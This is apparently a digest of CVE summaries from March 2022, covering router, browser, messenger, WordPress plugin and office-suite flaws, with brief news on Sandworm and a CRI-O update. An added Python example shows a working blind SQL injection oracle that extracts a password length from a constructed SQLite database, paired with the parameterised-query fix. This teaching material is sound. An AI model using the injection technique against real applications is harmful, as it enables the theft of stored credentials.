CVE-2021-44260 (published 2022-03-17; CVSS not yet calculated). A vulnerability in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, allows a remote attacker to access this page without any authentication. When processed, the page exposes key information about the router's manager.

wavlink — routers
CVE-2021-44259 (published 2022-03-17; CVSS not yet calculated). A vulnerability in the 'wx.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, allows a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects them to the device as a friend of the device owner.
whale_browser — whale_browser
CVE-2022-24074 (published 2022-03-17; CVSS not yet calculated). Whale Bridge, a default extension in Whale browser before 3.12.129.18, accepted any SendMessage request from the content script itself, which could lead to control of Whale Bridge if the renderer process is compromised.

whale_browser — whale_browser
CVE-2022-24075 (published 2022-03-17; CVSS not yet calculated). Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website, which has access to local HWP files. When HWP files were opened, the replaced script could read them.

whale_browser — whale_browser
CVE-2022-24072 (published 2022-03-17; CVSS not yet calculated). The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions being downloaded and uploaded when users open the developer tools.

whale_browser — whale_browser
CVE-2022-24073 (published 2022-03-17; CVSS not yet calculated). The Web Request API in Whale browser before 3.12.129.18 allowed extensions to deny access to the extension store, or to redirect to any URL, when users access the store.
wireapp — wire-server
CVE-2022-23610 (published 2022-03-16; CVSS not yet calculated). wire-server provides back end services for Wire, an open source messenger. In versions of wire-server prior to the 2022-01-27 release, it was possible to craft DSA signatures to bypass SAML SSO and impersonate any Wire user with SAML credentials. In teams with SAML but without SCIM, it was possible to create new accounts with fake SAML credentials. Under certain conditions that can be established by an attacker, an upstream library for parsing, rendering, signing, and validating SAML XML data was accepting as trusted public keys that were provided by the attacker inside the signature. As a consequence, the attacker could log in as any user in any Wire team with SAML SSO enabled. If SCIM was not enabled, the attacker could also create new users with new SAML NameIDs. In order to exploit this vulnerability, the attacker needs to know the SSO login code (distributed to all team members with SAML credentials and visible in the Team Management app), the SAML EntityID identifying the IdP (a URL not considered sensitive, but usually hard to guess, also visible in Team Management), and the SAML NameID of the user (usually an email address or a nick). The issue has been fixed in wire-server `2022-01-27` and is already deployed on all Wire managed services. On-premise instances of wire-server need to be updated to `2022-01-27` so that their backends are no longer affected. There are currently no known workarounds. More detailed information about how to reproduce the vulnerability and mitigation strategies is available in the GitHub Security Advisory.
wp-downloadmanager — wp-downloadmanager
CVE-2021-44760 (published 2022-03-18; CVSS not yet calculated). Authenticated reflected cross-site scripting (XSS) vulnerability discovered in the WP-DownloadManager WordPress plugin (versions <= 1.68.6).

wp-downloadmanager — wp-downloadmanager
CVE-2022-25605 (published 2022-03-18; CVSS not yet calculated). Multiple authenticated stored cross-site scripting (XSS) vulnerabilities discovered in the WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vulnerable parameters: &download_path, &download_path_url, &download_page_url.
wp_home_page_menu — wp_home_page_menu
CVE-2022-0684 (published 2022-03-14; CVSS not yet calculated). The WP Home Page Menu WordPress plugin before 3.1 does not sanitise and escape its settings, allowing high-privilege users such as admin to perform cross-site scripting attacks even when the unfiltered_html capability is disallowed.
wps_office_version — wps_office_version
CVE-2022-25969 (published 2022-03-17; CVSS not yet calculated). The installer of WPS Office Version 10.8.0.6186 insecurely loads VERSION.DLL (and possibly other DLLs), allowing an attacker to execute arbitrary code with the privileges of the user invoking the installer.

wps_office_version — wps_office_version
CVE-2022-26081 (published 2022-03-17; CVSS not yet calculated). The installer of WPS Office Version 10.8.0.5745 insecurely loads shcore.dll, allowing an attacker to execute arbitrary code with the privileges of the user invoking the installer.

wps_presentation — wps_presentation
CVE-2022-26511 (published 2022-03-17; CVSS not yet calculated). WPS Presentation 11.8.0.5745 insecurely loads d3dx9_41.dll when opening .pps files ('current directory type' DLL loading).
x2crm — x2crm
CVE-2021-33853 (published 2022-03-16; CVSS not yet calculated). A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser while the browser is connected to a trusted website. The attack uses the application as its vehicle and targets the application's users rather than the application itself. Additionally, the XSS payload is executed when the user attempts to access any page of the CRM.
xbit — xbit
CVE-2021-45822 (published 2022-03-16; CVSS not yet calculated). A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS occurs because /ajaxchat/sendChatData.php does not properly validate the value of the "n" POST parameter. Through this vulnerability, an attacker is able to execute malicious JavaScript code.

xbit — xbit
CVE-2021-45821 (published 2022-03-16; CVSS not yet calculated). A blind SQL injection vulnerability exists in Xbtit 3.1 via the sid parameter in the ajaxchat/getHistoryChatData.php file, which is accessible to a registered user. As a result, a malicious user can extract sensitive data such as usernames and passwords and, in some cases, use this vulnerability to obtain remote code execution on the web server.
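The entry above describes a blind injection: the endpoint never echoes query results that the attacker controls, but it does behave differently depending on whether an injected condition is true, which is enough to extract data one boolean at a time. The following added example (written for this page, not Xbtit's code) shows that oracle against a constructed SQLite schema, next to the parameterised query that closes it. The table names, rows and the `sid` query shape are assumptions for the illustration.

```python
"""Blind SQL injection oracle versus a parameterised query.

Added example of the bug class in the Xbtit entry; it is not Xbtit's code.
The schema, the rows and the shape of the chat-history query are constructed
for illustration.
"""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'hunter2');
        CREATE TABLE chat(sid TEXT, msg TEXT);
        INSERT INTO chat VALUES ('s1', 'hello'), ('s1', 'world'), ('s2', 'private');
        """
    )
    return conn


def history_vulnerable(conn: sqlite3.Connection, sid: str) -> List[Tuple[str]]:
    """The CVE pattern: the request parameter is spliced into the SQL text,
    so quote characters in sid change the statement's structure."""
    return conn.execute("SELECT msg FROM chat WHERE sid = '" + sid + "'").fetchall()


def history_safe(conn: sqlite3.Connection, sid: str) -> List[Tuple[str]]:
    """Parameter binding: sid is always data, never SQL syntax."""
    return conn.execute("SELECT msg FROM chat WHERE sid = ?", (sid,)).fetchall()


def blind_probe(conn: sqlite3.Connection, condition: str) -> bool:
    """Use the vulnerable endpoint as a yes/no oracle: rows for session s1 come
    back only when `condition` evaluates true.  The attacker never sees the
    users table directly; the row count is the whole side channel."""
    return bool(history_vulnerable(conn, f"s1' AND ({condition}) --"))


def recover_password_length(conn: sqlite3.Connection, max_len: int = 32) -> int:
    """One boolean question per candidate length; -1 if none matched."""
    for n in range(1, max_len + 1):
        if blind_probe(conn, f"(SELECT length(password) FROM users WHERE name='alice') = {n}"):
            return n
    return -1
```

The safe variant answers the same probe with an empty result because the bound value `s1' AND (...) --` is compared as a literal session id and matches nothing. Binding is the fix; escaping the quote is not, since the same endpoint would still be injectable through numeric parameters that are never quoted.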
xebd — accel-ppp
CVE-2022-0982 (published 2022-03-16; CVSS not yet calculated). The telnet_input_char function in opt/src/accel-pppd/cli/telnet.c suffers from a memory corruption vulnerability: user input of length cmdline_len is copied into the fixed-size buffer b->buf without any bounds check. If a malicious client connects to the server, crafted client requests can trigger this vulnerability remotely.
yokogawa — widefield3
CVE-2020-16232 (published 2022-03-18; CVSS not yet calculated). In Yokogawa WideField3 R1.01 through R4.03, a buffer overflow can be triggered when a user loads a maliciously crafted project file.
zero_spam — zero_spam
CVE-2022-0254 (published 2022-03-14; CVSS not yet calculated). The WordPress Zero Spam plugin before 5.2.11 does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection.
zulip — zulip
CVE-2022-24751 (published 2022-03-16; CVSS not yet calculated). Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate any cached sessions that may have been leaked through this bug. There are currently no known workarounds.


Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet

The Russian-speaking APT behind the NotPetya attacks and the Ukrainian power grid takedown could be setting up for additional sinister attacks, researchers said.

CRI-O Security Update for Kubernetes

Original release date: March 18, 2022

CRI-O has released a security update addressing a critical vulnerability—CVE-2022-0811—in CRI-O 1.19. A local attacker could exploit this vulnerability to take control of an affected Kubernetes environment as well as other software or platforms that use CRI-O runtime containers.

CISA encourages users and administrators to review the CRI-O Security Advisory and apply the necessary updates or workarounds.
